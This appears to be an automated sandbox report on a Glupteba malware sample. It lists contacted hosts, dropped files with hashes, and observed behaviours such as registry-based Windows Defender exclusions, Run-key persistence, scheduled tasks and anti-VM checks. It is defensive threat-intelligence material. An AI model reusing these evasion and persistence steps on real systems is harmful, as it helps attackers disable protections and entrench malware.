| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| BG | 185.82.216.111:443 | server5.localstats.org | tcp |
| N/A | 127.0.0.1:31465 | tcp | |
| BG | 185.82.216.111:443 | server5.localstats.org | tcp |
| BG | 185.82.216.111:443 | server5.localstats.org | tcp |
| N/A | 127.0.0.1:31465 | tcp | |
| BG | 185.82.216.111:443 | server5.localstats.org | tcp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
Files
memory/1756-0-0x00000000042E0000-0x00000000046D8000-memory.dmp
memory/1756-1-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1756-2-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1756-3-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1756-5-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2956-6-0x0000000004210000-0x0000000004608000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 02a79bce334d75092e310e6a574a2b77 |
| SHA1 | 96fb763797665e42fa509f77f4ed9bbf090ae234 |
| SHA256 | 046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27 |
| SHA512 | 4bb426d59219b1b1f1e6dd5c9a09c62330e4bdddc4edb349d625d5219146c42949fdd4128999acd9b9ded7f42afad828f43d49f8e237bc39ebad4dd592761173 |
memory/2956-15-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-16-0x00000000042A0000-0x0000000004698000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
memory/1676-23-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/1676-37-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Users\Admin\AppData\Local\Temp\Cab44B0.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar45D0.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
memory/2480-111-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
memory/2480-140-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
memory/1732-144-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2512-147-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/1732-148-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2480-149-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2512-151-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2480-150-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-152-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2512-154-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2480-155-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-156-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-158-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2512-161-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2480-160-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-163-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-164-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-166-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-169-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-171-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-172-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-174-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-177-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-178-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-180-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-182-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-185-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-186-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-188-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-191-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-193-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-194-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-196-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2480-199-0x0000000000400000-0x0000000002957000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
| MD5 | dcb505dc2b9d8aac05f4ca0727f5eadb |
| SHA1 | 4f633edb62de05f3d7c241c8bc19c1e0be7ced75 |
| SHA256 | 61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551 |
| SHA512 | 31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3 |
memory/2480-211-0x000000002F320000-0x000000002F801000-memory.dmp
memory/2260-212-0x0000000000400000-0x00000000008E1000-memory.dmp
memory/2480-210-0x000000002F320000-0x000000002F801000-memory.dmp
memory/2480-207-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
| MD5 | 713674d5e968cbe2102394be0b2bae6f |
| SHA1 | 90ac9bd8e61b2815feb3599494883526665cb81e |
| SHA256 | f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057 |
| SHA512 | e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb |
memory/2480-221-0x000000002F320000-0x000000002FBED000-memory.dmp
memory/2260-224-0x0000000000400000-0x00000000008E1000-memory.dmp
memory/2480-223-0x000000002F320000-0x000000002FBED000-memory.dmp
memory/780-225-0x0000000000830000-0x00000000010FD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
| MD5 | 1bf850b4d9587c1017a75a47680584c4 |
| SHA1 | 75cd4738ffc07f203c3f3356bc946fdd0bcdbe19 |
| SHA256 | ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955 |
| SHA512 | ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-09 22:32
Reported
2024-05-09 22:37
Platform
win10-20240404-en
Max time kernel
299s
Max time network
301s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-162 = "Central Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
